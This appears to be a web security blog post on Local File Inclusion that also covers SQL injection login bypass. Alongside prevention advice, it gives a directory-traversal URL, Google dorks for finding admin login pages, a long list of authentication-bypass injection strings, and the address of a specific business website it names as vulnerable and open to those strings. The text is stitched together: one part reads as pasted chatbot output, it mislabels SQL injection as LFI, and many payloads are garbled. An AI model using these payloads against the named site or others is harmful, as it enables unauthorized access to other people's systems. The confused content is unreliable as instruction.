Introduction

Local File Inclusion (LFI) is a critical web security vulnerability that allows attackers to include files from a web server into the application's response. Exploiting LFI can lead to sensitive data disclosure, code execution, or even full system compromise.

In this article, we will explore what LFI is, how attackers exploit it, real-world examples, and how to protect your web applications.

What is Local File Inclusion (LFI)?

LFI occurs when an application allows user input to specify a file path that the server includes and processes without proper validation. If improperly handled, this can enable an attacker to read sensitive files, execute malicious scripts, or escalate privileges.

Example of an LFI Vulnerability:

A vulnerable PHP script might look like this:

<?php
    $file = $_GET['page'];
    include("pages/" . $file);
?>

If the input is not properly validated, an attacker can manipulate it like this:

http://example.com/index.php?page=../../../../etc/passwd

This could expose system files such as /etc/passwd on Linux-based systems.

How Attackers Exploit LFI

Attackers can use LFI for various malicious activities, including:

  • Reading sensitive files: Accessing configuration files, credentials, and logs.
  • Code execution: If LFI allows PHP wrappers like php://input, an attacker may execute arbitrary PHP code.
  • Webshell injection: Uploading a malicious file and including it to gain remote access.

Real-World Example of LFI Exploit

A notable LFI exploit was found in WordPress plugins where insecure file inclusion allowed attackers to access wp-config.php, leading to full site compromise.

Another case involved CPanel servers, where poorly validated file paths allowed attackers to escalate privileges and access server configurations.

Example Use of Dorks:

  • Finding Admin Login Pages:

inurl: admin/login.php site:.com

None

inurl: admin/login.php site:.in

None

inurl: admin/login.php

inurl: admin/index.php

inurl: admin

inurl: login.php

inurl: login.php site:.in

The login example you provided, using:

  • Username: 1' OR '1'='1
  • Password: 1' OR '1'='1

Others Username/Password would be work:

' or 1=1#

or 1=1

" or ""="

or 1=1 —

or 1=1#

or 1=1/*

admin' —

admin' #

admin'/*

admin' or Ƈ'=Ƈ

admin' or Ƈ'=Ƈ' —

admin' or Ƈ'=Ƈ'#

admin' or Ƈ'=Ƈ'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1 —

admin' or 1=1#

admin' or 1=1/*

admin') or (Ƈ'=Ƈ

admin') or (Ƈ'=Ƈ' —

admin') or (Ƈ'=Ƈ'#

admin') or (Ƈ'=Ƈ'/*

admin') or Ƈ'=Ƈ

admin') or Ƈ'=Ƈ' —

admin') or Ƈ'=Ƈ'#

admin') or Ƈ'=Ƈ'/*

Some times it would work user: admin Password: admin

is an example of a SQL Injection (SQLi) attack. This attack manipulates the SQL query used to authenticate the user by injecting malicious SQL code into the input fields. Here's how it works:

Explanation of SQL Injection in this Case:

  1. SQL Query Vulnerability: The login system likely executes a SQL query like this:
SELECT * FROM users WHERE username = '$username' AND password = '$password';
  1. If the system does not properly sanitize the user input, the input can be manipulated to change the query logic.
  2. Injected Code: By entering 1' OR '1'='1 as both the username and password, the SQL query becomes:
SELECT * FROM users WHERE username = '1' OR '1'='1' AND password = '1' OR '1'='1';
  • The condition '1'='1' is always true, so the query will always return true, effectively bypassing the authentication process.
  • This means the attacker can log in without knowing the correct username or password.

Here Some Site which is LFI Vulnerable & Can be login by Username: 1' OR '1'='1 Password: 1' OR '1'='1 :

https://www.balajeepackersandmovers.com/admin/login.php

Preventing SQL Injection:

To protect against SQL injection attacks, here are some key measures to follow:

  1. Use Prepared Statements: Always use prepared statements with parameterized queries. These separate the SQL logic from user input, ensuring that user input is treated as data and not executable code.
  • Example in PHP with PDO:
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username AND password = :password"); $stmt->execute(['username' => $username, 'password' => $password]);
  1. Input Validation: Validate and sanitize user input. Ensure that inputs meet expected formats (e.g., for username, only alphanumeric characters). Reject any inputs containing SQL keywords or characters that can alter the query (e.g., ', --, ;).
  2. Use ORM (Object-Relational Mapping): If possible, use an ORM (like Eloquent for Laravel or Django ORM) that abstracts away raw SQL queries, helping prevent SQL injection vulnerabilities.
  3. Least Privilege: Ensure that the database account used by the application has the least privileges necessary to perform the required operations. For example, the database account used for authentication should not have administrative privileges.
  4. Error Handling: Avoid displaying detailed error messages that reveal database structure or SQL query details. These can assist attackers in crafting more precise attacks.

Conclusion:

SQL Injection is a serious vulnerability, and the example you gave demonstrates a basic way in which attackers can bypass authentication. By following secure coding practices like using prepared statements and input validation, you can effectively mitigate the risk of such attacks.

How to Prevent LFI Vulnerabilities

To protect web applications from LFI attacks, developers should follow these best practices:

  1. Use Allowlist Input Validation:
  • Instead of accepting any user input, allow only predefined file names.
  • Example:
$allowed_files = ['home.php', 'contact.php']; if (!in_array($_GET['page'], $allowed_files)) {     die("Invalid file selection"); }
  1. Disable Dangerous Functions:
  • Restrict functions like include, require, eval, and file_get_contents where possible.
  1. Use Secure File Paths:
  • Avoid directly using user input in file paths.
  • Example:
$safe_pages = [     'home' => 'pages/home.php',     'contact' => 'pages/contact.php' ]; include($safe_pages[$_GET['page']] ?? 'pages/error.php');
  1. Implement Web Application Firewalls (WAF):
  • Use tools like ModSecurity to detect and block LFI attempts.
  1. Set Proper File Permissions:
  • Restrict access to sensitive files and directories.
  1. Sanitize User Input:
  • Use basename() to prevent directory traversal.
$file = basename($_GET['page']); include("pages/$file");

Conclusion

LFI vulnerabilities are dangerous but preventable with proper security measures. By validating input, restricting file access, and using security mechanisms like WAFs, developers can safeguard their applications from LFI attacks. Always perform security audits and follow best practices to protect your web applications from exploitation.

Further Reading